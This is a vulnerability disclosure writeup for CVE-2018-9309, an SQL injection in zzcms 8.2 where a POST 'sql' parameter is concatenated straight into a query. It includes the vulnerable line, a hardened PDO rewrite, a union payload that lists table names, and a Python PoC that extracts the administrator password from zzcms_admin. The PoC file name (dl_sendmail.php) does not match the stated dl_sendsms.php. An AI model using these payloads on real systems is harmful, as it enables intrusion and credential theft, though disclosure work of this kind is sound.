# CVE-2018-9309: vulnerability/dl_sendsms.php.md at master · lihonghuyang/vulnerability
An issue was discovered in zzcms 8.2. It allows SQL injection via the id parameter in a dl/dl_sendsms.php request.
**Edition**

zzcms 8.2

**Location**

/dl/dl_sendsms.php
**Code**

```php
$sql2=$sql." order by id asc limit $n,$size";
```

Rows: 73

**Harm**

The password can be obtained through SQL injection.
**Cause**

Look at the logic of the bug: if the POST request is not empty, `$sql` is set to `$_POST["sql"]`, and `$sql` is then concatenated directly into `$sql2`:

```php
$sql2=$sql." order by id asc limit $n,$size";
```

`$sql` is not quoted or filtered in any way, so this causes SQL injection.
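As an added example, not code from zzcms or from this writeup, here is how the same paginated query can be built without taking SQL text from the request: the client chooses only a page number and page size, both validated as integers, and the statement text is fixed with the values bound through PDO. The table name zzcms_dl comes from the page; the column names and the connection placeholders are assumptions.

```php
<?php
// Added example (not zzcms code): a hardened replacement for the pattern
// described above, where the raw $_POST['sql'] string was concatenated into
// the query. The client may only choose a page and a page size; the SQL text
// itself is constant and all values are bound as parameters.
// Assumptions: table zzcms_dl (named on the page) with columns id and email;
// the DB_* connection values are placeholders.

function fetchEmailsPage(PDO $db, array $post): array
{
    // Validate pagination input: integers only, within sane bounds.
    // Anything else (including SQL text) falls back to the default.
    $page = filter_var($post['page'] ?? 1, FILTER_VALIDATE_INT, [
        'options' => ['default' => 1, 'min_range' => 1],
    ]);
    $size = filter_var($post['size'] ?? 20, FILTER_VALIDATE_INT, [
        'options' => ['default' => 20, 'min_range' => 1, 'max_range' => 100],
    ]);
    $offset = ($page - 1) * $size;

    // The statement text is a literal; no request data is concatenated into it.
    $stmt = $db->prepare(
        'SELECT id, email FROM zzcms_dl ORDER BY id ASC LIMIT :offset, :size'
    );
    // LIMIT arguments must be bound as integers; bound as strings MySQL
    // would reject the quoted values.
    $stmt->bindValue(':offset', $offset, PDO::PARAM_INT);
    $stmt->bindValue(':size', $size, PDO::PARAM_INT);
    $stmt->execute();

    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Connection placeholders (assumed); real server-side prepares, exceptions on error.
$db = new PDO(
    'mysql:host=DB_HOST;dbname=DB_NAME;charset=utf8mb4',
    'DB_USER',
    'DB_PASS',
    [
        PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION,
        PDO::ATTR_EMULATE_PREPARES => false,
    ]
);

$rows = fetchEmailsPage($db, $_POST);
```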
**Construct a payload to verify**

```
sql=select email from zzcms_dl where id=-1 union select group_concat(distinct table_name) from information_schema.columns where table_schema=database()#
```
**PoC**

```python
import requests

url = "http://192.168.199.23/dl/dl_sendmail.php"
cookies = {'UserName': '1234', 'PassWord': '81dc9bdb52d04dc20036dbd8313ed055'}

data = {'sql': 'select email from zzcms_dl where id=-1 union select pass from zzcms_admin #'}

r = requests.post(url, data, cookies=cookies)
r.encoding = 'utf-8'
print(r.text)
```
![6][6]

Get the administrator password

[6]: ./images/6.png "6"